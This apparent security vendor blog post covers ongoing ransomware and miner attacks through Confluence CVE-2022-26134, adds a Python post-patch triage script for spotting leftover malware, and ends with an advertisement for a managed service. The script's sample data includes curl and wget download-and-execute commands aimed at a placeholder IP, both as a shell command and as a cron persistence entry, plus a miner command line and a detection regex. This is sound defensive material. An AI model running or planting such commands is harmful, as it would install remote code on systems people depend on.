Atlassian Confluence vulnerability continues to be actively exploited!
by Tina Siering
The critical vulnerability (CVE-2022-26134, CVSS score: 9.8) in Atlassian Confluence Server and Data Center, patched in early June, continues to be actively exploited for ransomware attacks. In at least two incidents, attackers used the vulnerability to deploy malicious code, for example Cerber ransomware, Cobalt Strike delivered via a web shell, Mirai and Kinsing bot variants, and a crypto miner called z0miner.
If the patch has not yet been applied, it is highly likely that the system has already been compromised, and it should be investigated forensically accordingly.
Supposedly closed security holes also remain a danger: the patch closes the entry point, but a crypto miner that attackers have already installed keeps doing its job after the system is patched. The same applies to any other malicious code that was successfully deployed before the patch.
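The two points above, that an unpatched host is probably already compromised and that patching does not remove what was dropped, mean a patch must be followed by a host check. The script below is an added example written for this article, not tooling from Allgeier secion or Atlassian. It takes a process listing in the format of `ps -eo pid,user,pcpu,etime,args` plus the service account's crontab and flags the kinds of leftovers the article names: non-Java processes running as the Confluence service account, CPU-heavy binaries executing from world-writable directories, and download-and-execute commands used for persistence. The account name `confluence`, the directory list and the sample process and cron lines are all assumptions or constructed data, not IoCs from the article.

```python
"""Post-patch triage for a Confluence host (added example, not from the article).

Patching CVE-2022-26134 closes the entry point but leaves anything an attacker
already installed (miners, web shells, bots) running. This script scans a
process listing and a crontab for such leftovers. All sample data below is
constructed for illustration; nothing here is a real indicator of compromise.
"""
import re
from dataclasses import dataclass

CONFLUENCE_USER = "confluence"                       # assumption: service account name
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumption: common drop locations
CPU_THRESHOLD = 80.0                                 # percent CPU that warrants a look

# curl/wget whose output is piped into a shell: classic download-and-execute
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


@dataclass
class Finding:
    kind: str    # unexpected-process | miner-suspect | download-exec
    detail: str  # the offending process or cron line


def parse_ps(lines):
    """Parse `ps -eo pid,user,pcpu,etime,args` output; the first line is the header."""
    procs = []
    for line in lines[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, user, pcpu, etime, args = parts
        procs.append({"pid": int(pid), "user": user, "pcpu": float(pcpu),
                      "etime": etime, "args": args})
    return procs


def check_processes(procs):
    """Flag processes that do not belong on a patched Confluence host."""
    findings = []
    for p in procs:
        exe = p["args"].split()[0]
        label = f"pid {p['pid']} ({p['user']}, {p['pcpu']}% CPU): {p['args']}"
        # The service account should only be running the Java/Confluence process.
        if p["user"] == CONFLUENCE_USER and "java" not in exe and "confluence" not in exe:
            findings.append(Finding("unexpected-process", label))
        # A CPU-hungry binary living in /tmp or similar is typical of a dropped miner.
        if p["pcpu"] >= CPU_THRESHOLD and exe.startswith(WRITABLE_DIRS):
            findings.append(Finding("miner-suspect", label))
        if DOWNLOAD_EXEC.search(p["args"]):
            findings.append(Finding("download-exec", label))
    return findings


def check_cron(lines):
    """Flag cron entries that re-fetch and execute remote content (persistence)."""
    return [Finding("download-exec", f"cron: {line.strip()}")
            for line in lines
            if not line.lstrip().startswith("#") and DOWNLOAD_EXEC.search(line)]


def run_triage(ps_lines, cron_lines):
    """Return all findings for a host; an empty list means nothing was flagged."""
    return check_processes(parse_ps(ps_lines)) + check_cron(cron_lines)


# Constructed sample input: one legitimate Java process, one miner-like binary,
# one shell fetching a script, one unrelated database process.
PS_SAMPLE = """PID USER %CPU ELAPSED COMMAND
  812 confluence  3.2 12-04:11:03 /opt/atlassian/confluence/jre/bin/java -Xmx2g org.apache.catalina.startup.Bootstrap start
 4417 confluence 97.5    02:13:44 /tmp/.x/kthreadd -o pool.invalid:3333 -u WALLET_PLACEHOLDER
 4421 confluence  0.0    02:13:40 /bin/sh -c curl -s http://203.0.113.9/k.sh | sh
 1201 postgres    1.0 12-04:10:50 postgres: checkpointer
""".splitlines()

CRON_SAMPLE = """# m h dom mon dow command
*/10 * * * * (curl -fsSL http://203.0.113.9/k.sh || wget -q -O- http://203.0.113.9/k.sh) | sh
0 3 * * * /opt/atlassian/confluence/bin/backup.sh
""".splitlines()

if __name__ == "__main__":
    for f in run_triage(PS_SAMPLE, CRON_SAMPLE):
        print(f"[{f.kind}] {f.detail}")
```

On a real host the two inputs would come from `ps -eo pid,user,pcpu,etime,args` and `crontab -u confluence -l`; the checks are deliberately simple allowlist and pattern rules, so a clean result is a starting point for forensic investigation, not proof that the host is clean.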
Our Allgeier secion customers with an active managed service contract for ACD are of course notified of malicious communication detected on their systems; for example, we are currently actively checking for the Confluence IoCs.
Conclusion
Time is and remains a critical factor in detecting and eliminating cyber threats such as ransomware.
We show you that you no longer need a SOC, SIEM or forensics: with the Active Cyber Defense (ACD) service, you will know 24/7 whether attack activity is taking place on your network, immediately after a system has been compromised.
ACD relieves your IT security team and can be booked as a managed service at a fixed monthly price.